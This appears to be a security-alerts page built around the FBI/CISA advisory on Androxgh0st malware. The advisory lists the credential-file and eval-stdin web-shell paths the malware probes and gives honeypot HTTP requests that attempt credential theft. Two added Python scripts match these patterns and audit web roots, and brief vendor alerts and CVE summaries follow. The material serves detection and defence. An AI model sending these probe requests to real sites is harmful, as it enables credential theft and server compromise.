Categories
alerts

Known Indicators of Compromise Associated with Androxgh0st Malware

SUMMARY

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

Androxgh0st malware has been observed establishing a botnet [T1583.005] for victim identification and exploitation in target networks. According to open source reporting[1], Androxgh0st is a Python-scripted malware [T1059.006] primarily used to target .env files that contain confidential information, such as credentials [T1552.001] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [T1046] and exploiting exposed credentials [T1078] and application programming interfaces (APIs) [T1114], and web shell deployment [T1505.003].

Targeting the PHPUnit

Androxgh0st malware TTPs commonly involve the use of scripts, conducting scanning [T1595], and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on vulnerable websites via PHPUnit [T1190]. Websites using the PHPUnit module that have internet-accessible (exposed) /vendor folders are subject to malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.

Malicious actors likely use Androxgh0st to download malicious files [T1105] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.

Laravel Framework Targeting

Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level .env file is exposed and contains credentials for accessing additional services. Note: .env files commonly store credentials and tokens. Threat actors often target .env files to steal these credentials within the environment variables.

If the .env file is exposed, threat actors will issue a GET request to the /.env URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named 0x[] containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.

Androxgh0st malware can also access the application key [TA0006] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [T1027.010]. The encrypted code is then passed to the website as a value in the cross-site request forgery (XSRF) token cookie, XSRF-TOKEN, and included in a future GET request to the website. The vulnerability defined in CVE-2018-15133 indicates that on Laravel applications, XSRF token values are subject to an unserialize call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.

Apache Web Server Targeting

In correlation with CVE-2021-41773, Androxgh0st actors have been observed scanning vulnerable web servers [T1595.002] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside the root directory through a path traversal attack [T1083]. If these files are not protected by the “require all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.

If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [T1136]. Additionally, Androxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [T1583.006].

INDICATORS OF COMPROMISE (IOCs)

Based on investigations and analysis, the following requests are associated with Androxgh0st activity:

  • Incoming GET and POST requests to the following URIs:
    • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    • /.env
  • Incoming POST requests with the following strings:
    • [0x%5B%5D=androxgh0st]
    • ImmutableMultiDict([('0x[]', 'androxgh0st')])

In both previously listed POST request strings, the name androxgh0st has been observed to be replaced with other monikers.

Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:

  • /info
  • /phpinfo
  • /phpinfo.php
  • /?phpinfo=1
  • /frontend_dev.php/$
  • /_profiler/phpinfo
  • /debug/default/view?panel=config
  • /config.json
  • /.json
  • /.git/config
  • /live_env
  • /.env.dist
  • /.env.save
  • /environments/.env.production
  • /.env.production.local
  • /.env.project
  • /.env.development
  • /.env.production
  • /.env.prod
  • /.env.development.local
  • /.env.old
  • //.env
    • Note: the actor may attempt multiple different potential URI endpoints scanning for the .env file, for example /docker/.env or /local/.env.
  • /.aws/credentials
  • /aws/credentials
  • /.aws/config
  • /.git
  • /.test
  • /admin
  • /backend
  • /app
  • /current
  • /demo
  • /api
  • /backup
  • /beta
  • /cron
  • /develop
  • /Laravel
  • /laravel/core
  • /gists/cache
  • /test.php
  • /info.php
  • //.env
  • /admin-app/.env%20
  • /laravel/.env%20
  • /shared/.env%20
  • /.env.project%20
  • /apps/.env%20
  • /development/.env%20
  • /live_env%20
  • /.env.development%20

Targeted URIs for web-shell drop:

  • /.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //lib/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/Util/PHP/eval-stdin.php
  • //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/Util/PHP/eval-stdin.php
  • //phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/Util/PHP/eval-stdin.php
  • //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php
  • //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //vendor/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/Util/PHP/eval-stdin.php
  • //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php
  • /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/Util/PHP/eval-stdin.php
  • /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php
  • /phpunit/src/Util/PHP/eval-stdin.php
  • ./phpunit/Util/PHP/eval-stdin.php
  • /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php%20
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

An example of attempted credential exfiltration through (honeypot) open proxies:

POST /.aws/credentials HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
content-length: 20
content-type: application/x-www-form-urlencoded

0x%5B%5D=androxgh0st

An example of attempted web-shell drop through (honeypot) open proxies:

GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
x-forwarded-for: 200.172.238.135
content-length: 279

Monikers used instead of Androxgh0st (0x%5B%5D=???):
  • Ridho
  • Aws
  • 0x_0x
  • x_X
  • nopebee7
  • SMTPEX
  • evileyes0
  • privangga
  • drcrypter
  • errorcool
  • drosteam
  • androxmen
  • crack3rz
  • b4bbyghost
  • 0x0day
  • janc0xsec
  • blackb0x
  • 0x1331day
  • Graber
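
The request patterns above can be checked against captured traffic with a small matcher. This is an added example, not code from the advisory: the function names and finding labels are hypothetical, and the regular expressions generalise the listed URIs (any path prefix, doubled slashes, trailing %20, any moniker in the 0x[] variable).

```python
"""Match raw HTTP requests against the Androxgh0st request patterns.

Added example; function names and finding labels are hypothetical.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path patterns generalised from the URI lists in this advisory.
EVAL_STDIN = re.compile(r"(^|/)eval-?stdin\.php", re.IGNORECASE)
ENV_FILE = re.compile(r"(^|/)(\.env(\.[\w.-]+)?|live_env)$")
AWS_FILE = re.compile(r"(^|/)\.?aws/(credentials|config)$")
# The marker as it appears when a framework logs the parsed form data.
MULTIDICT_MARKER = re.compile(r"\('0x\[\]',\s*'([^']*)'\)")

# Sample requests. The first two are abbreviated from the advisory's honeypot
# examples; the rest are constructed from URIs and monikers it lists.
SAMPLES = [
    "POST /.aws/credentials HTTP/1.1\nhost: www.example.com\n"
    "content-type: application/x-www-form-urlencoded\n\n0x%5B%5D=androxgh0st\n",
    "GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/"
    "eval-stdin.php HTTP/1.1\nhost: www.example.com\n\n",
    "POST //.env HTTP/1.1\nhost: www.example.com\n\n0x%5B%5D=Ridho",
    "GET /shared/.env%20 HTTP/1.1\nhost: www.example.com\n\n",
    "GET /docs/environment.html HTTP/1.1\nhost: www.example.com\n\n",
]


def normalize_path(target):
    """Return the decoded path of a request target with scanner noise removed."""
    if target.startswith("/"):
        # Origin-form target; urlsplit would read '//.env' as a host name.
        path = target.split("?", 1)[0]
    else:
        # Absolute-form target, as seen in requests sent through open proxies.
        path = urlsplit(target).path
    path = unquote(path).strip()        # '/.env%20' -> '/.env'
    return re.sub(r"/{2,}", "/", path)  # '//.env'   -> '/.env'


def marker_value(body):
    """Return the value of the '0x[]' POST variable, or None if absent."""
    values = parse_qs(body.strip(), keep_blank_values=True).get("0x[]")
    if values:
        return values[0]
    logged = MULTIDICT_MARKER.search(body)
    return logged.group(1) if logged else None


def inspect_request(raw):
    """Parse one raw HTTP request and list the advisory patterns it matches."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2:  # not a parsable request line
        return {"method": None, "path": None, "moniker": None, "findings": []}
    method, target = request_line[0].upper(), request_line[1]
    path = normalize_path(target)
    findings = []
    if EVAL_STDIN.search(path):
        findings.append("phpunit-eval-stdin")
    if ENV_FILE.search(path):
        findings.append("env-file-probe")
    if AWS_FILE.search(path):
        findings.append("aws-credential-probe")
    moniker = marker_value(body) if method == "POST" else None
    if moniker is not None:
        findings.append("0x[]-marker")
    return {"method": method, "path": path, "moniker": moniker,
            "findings": findings}


def scan(raw_requests):
    """Return the inspection results for requests with at least one finding."""
    results = (inspect_request(raw) for raw in raw_requests)
    return [r for r in results if r["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit["method"], hit["path"], hit["findings"], hit["moniker"])
```
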

Example malware drops through eval-stdin.php:


MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.

Table 1: Reconnaissance

Technique Title | ID | Use
Active Scanning: Vulnerability Scanning | T1595.002 | The threat actor scans websites for specific vulnerabilities to exploit.

Table 2: Resource Development

Technique Title | ID | Use
Acquire Infrastructure: Botnet | T1583.005 | The threat actor establishes a botnet to identify and exploit victims.
Acquire Infrastructure: Web Services | T1583.006 | The threat actor creates new AWS instances to use for scanning.

Table 3: Initial Access

Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | The threat actor exploits CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit.

Table 4: Execution

Technique Title | ID | Use
Command and Scripting Interpreter: Python | T1059.006 | The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files.

Table 5: Persistence

Technique Title | ID | Use
Valid Accounts | T1078 | The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials.
Server Software Component: Web Shell | T1505.003 | The threat actor deploys web shells to maintain persistent access to systems.
Create Account | T1136 | The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website.

Table 6: Defense Evasion

Technique Title | ID | Use
Obfuscated Files or Information: Command Obfuscation | T1027.010 | The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie.

Table 7: Credential Access

Technique Title | ID | Use
Credential Access | TA0006 | The threat actor can access the application key of the Laravel application on the site.
Unsecured Credentials: Credentials in Files | T1552.001 | The threat actor targets .env files that contain confidential credential information.

Table 8: Discovery

Technique Title | ID | Use
File and Directory Discovery | T1083 | The threat actor can identify URLs for files outside root directory through a path traversal attack.
Network Service Discovery | T1046 | The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning.

Table 9: Collection

Technique Title | ID | Use
Email Collection | T1114 | The threat actor interacts with application programming interfaces (APIs) to gather information.

Table 10: Command and Control

Technique Title | ID | Use
Ingress Tool Transfer | T1105 | The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website.

MITIGATIONS

The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s Secure by Design webpage.

The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.

  • Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
  • Verify that the default configuration for all URIs is to deny all requests unless there is a specific need for it to be accessible.
  • Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from .env files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.
  • On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the .env file for unauthorized access or use.
  • Scan the server’s file system for unrecognized PHP files, particularly in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder.
  • Review outgoing GET requests (via cURL command) to file hosting sites such as GitHub, pastebin, etc., particularly when the request accesses a .php file.
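
The file-system checks in the list above (PHP files that do not belong in the web root or the PHPUnit Util/PHP folder, .env files with debug mode on or cloud credentials inside) can be scripted. This is an added example, not part of the advisory: the function names, finding labels, the deployment baseline passed as known_php, and the demo tree are all constructed, and the .env key names checked (APP_DEBUG, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) are an assumption about what the application uses.

```python
"""Audit a web root for the conditions named in the mitigations above.

Added example; names, labels and the demo tree are constructed.
"""
import os
import re
import tempfile

PHPUNIT_DIR = "vendor/phpunit/phpunit/src/Util/PHP"
# Assumed key names: Laravel's APP_DEBUG switch and the usual AWS variables.
DEBUG_ON = re.compile(r"^\s*APP_DEBUG\s*=\s*[\"']?true[\"']?\s*$", re.I | re.M)
CLOUD_KEY = re.compile(
    r"^\s*(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)\s*=\s*\S+", re.M)


def audit_webroot(docroot, known_php=frozenset()):
    """Return sorted (finding, relative path) pairs for files under docroot.

    known_php is the set of relative paths of PHP files the deployment is
    expected to contain; anything else in the root or PHPUnit folder is flagged.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        rel_dir = os.path.relpath(dirpath, docroot).replace(os.sep, "/")
        for name in files:
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            if name == ".env" or name.startswith(".env."):
                # Any .env file below the document root may be web-reachable.
                findings.append(("env-file-in-webroot", rel))
                with open(os.path.join(dirpath, name), errors="replace") as fh:
                    text = fh.read()
                if DEBUG_ON.search(text):
                    findings.append(("laravel-debug-enabled", rel))
                if CLOUD_KEY.search(text):
                    # Report the file only; never echo the secret itself.
                    findings.append(("cloud-credentials-in-env", rel))
            elif name.lower().endswith(".php"):
                if name == "eval-stdin.php":
                    # The CVE-2017-9841 endpoint is present under the web root.
                    findings.append(("phpunit-eval-stdin-in-webroot", rel))
                elif (rel_dir == "." or rel_dir.endswith(PHPUNIT_DIR)) \
                        and rel not in known_php:
                    findings.append(("unrecognized-php", rel))
    return sorted(findings)


def demo():
    """Build a constructed web root in a temporary directory and audit it."""
    files = {
        ".env": "APP_ENV=local\nAPP_DEBUG=true\n"
                "AWS_ACCESS_KEY_ID=EXAMPLE-PLACEHOLDER\n",
        "index.php": "<?php // application entry point\n",
        "x7.php": "<?php // not part of the deployment\n",
        PHPUNIT_DIR + "/eval-stdin.php": "<?php\n",
        PHPUNIT_DIR + "/AbstractPhpProcess.php": "<?php\n",
        PHPUNIT_DIR + "/up.php": "<?php\n",
    }
    known = {"index.php", PHPUNIT_DIR + "/AbstractPhpProcess.php"}
    with tempfile.TemporaryDirectory() as root:
        for rel, content in files.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(content)
        return audit_webroot(root, known)


if __name__ == "__main__":
    for finding, path in demo():
        print(f"{finding:32} {path}")
```

Credentials found this way should be revoked, as the mitigation says, not just deleted from the file.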

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 1-10).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REPORTING

The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI field office. With regard to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.

When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA via its Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

REFERENCES

  1. Fortinet – FortiGuard Labs: Threat Signal Report: AndroxGh0st Malware Actively Used in the Wild

ACKNOWLEDGEMENTS

Amazon contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.

VERSION HISTORY

January 16, 2024: Initial version.


Cisco Releases Security Advisory for Cisco Unity Connection

Cisco released a security advisory to address a vulnerability (CVE-2024-20272) in Cisco Unity Connection. A cyber threat actor could exploit this vulnerability to take control of an affected system.

CISA encourages users and administrators to review the Cisco Unity Connection Unauthenticated Arbitrary File Upload Vulnerability advisory and apply the necessary updates.


Juniper Networks Releases Security Bulletin for Junos OS and Junos OS Evolved

Juniper Networks has released a security advisory to address a vulnerability (CVE-2024-21611) in Junos OS and Junos OS Evolved. A cyber threat actor could exploit this vulnerability to cause a denial-of-service condition.

CISA encourages users and administrators to review the Juniper Advisory JSA75752 and apply the necessary updates.


Ivanti Releases Security Update for Connect Secure and Policy Secure Gateways

Ivanti has released a security update to address an authentication bypass vulnerability (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) in all supported versions (9.x and 22.x) of Connect Secure and Policy Secure gateways. A cyber threat actor could exploit these vulnerabilities to take control of an affected system.
 
Ivanti reports active exploitation of both CVE-2023-46805 and CVE-2024-21887.
 
CISA urges users and administrators to immediately review Ivanti’s security update and apply the current workaround. CISA will update this alert as Ivanti releases patches.


Vulnerability Summary for the Week of January 1, 2024

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
7-card — fakabao A vulnerability has been found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this vulnerability is an unknown functionality of the file shop/alipay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249385 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7183
cna@vuldb.com
7-card — fakabao A vulnerability was found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this issue is some unknown functionality of the file shop/notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249386 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7184
cna@vuldb.com
7-card — fakabao A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been classified as critical. This affects an unknown part of the file shop/wxpay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249387. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7185
cna@vuldb.com
7-card — fakabao A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been declared as critical. This vulnerability affects unknown code of the file member/notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249388. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7186
cna@vuldb.com
amazon-ion — ion-java Amazon Ion is a Java implementation of the Ion data notation. Prior to version 1.10.5, a potential denial-of-service issue exists in `ion-java` for applications that use `ion-java` to deserialize Ion text encoded data, or deserialize Ion text or binary encoded data into the `IonValue` model and then invoke certain `IonValue` methods on that in-memory representation. An actor could craft Ion data that, when loaded by the affected application and/or processed using the `IonValue` model, results in a `StackOverflowError` originating from the `ion-java` library. The patch is included in `ion-java` 1.10.5. As a workaround, do not load data which originated from an untrusted source or that could have been tampered with. 2024-01-03 7.5 CVE-2024-21634
security-advisories@github.com
apache — dolphinscheduler Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue. 2023-12-30 8.8 CVE-2023-49299
security@apache.org
apktool — apktool Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files’ output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either username is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue. 2024-01-03 7.8 CVE-2024-21633
security-advisories@github.com
campcodes — chic_beauty_salon A vulnerability classified as critical was found in Campcodes Chic Beauty Salon 20230703. Affected by this vulnerability is an unknown functionality of the file product-list.php of the component Product Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249157 was assigned to this vulnerability. 2023-12-29 8.8 CVE-2023-7150
cna@vuldb.com
campcodes — online_college_library_system A vulnerability has been found in Campcodes Online College Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file index.php of the component Search. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249178 is the identifier assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7156
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, has been found in Campcodes Online College Library System 1.0. This issue affects some unknown processing of the file /admin/book_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249365 was assigned to this vulnerability. 2023-12-30 7.2 CVE-2023-7178
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical has been found in Campcodes Online College Library System 1.0. This affects an unknown part of the file /admin/return_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249363. 2023-12-30 8.8 CVE-2023-7176
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical was found in Campcodes Online College Library System 1.0. This vulnerability affects unknown code of the file /admin/book_add.php of the component HTTP POST Request Handler. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249364. 2023-12-30 8.8 CVE-2023-7177
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, was found in Campcodes Online College Library System 1.0. Affected is an unknown function of the file /admin/category_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249366 is the identifier assigned to this vulnerability. 2023-12-30 8.8 CVE-2023-7179
cna@vuldb.com
cesanta — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component. 2024-01-02 7.5 CVE-2023-49550
cve@mitre.org
cesanta — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_parse function in the msj.c file. 2024-01-02 7.5 CVE-2023-49551
cve@mitre.org
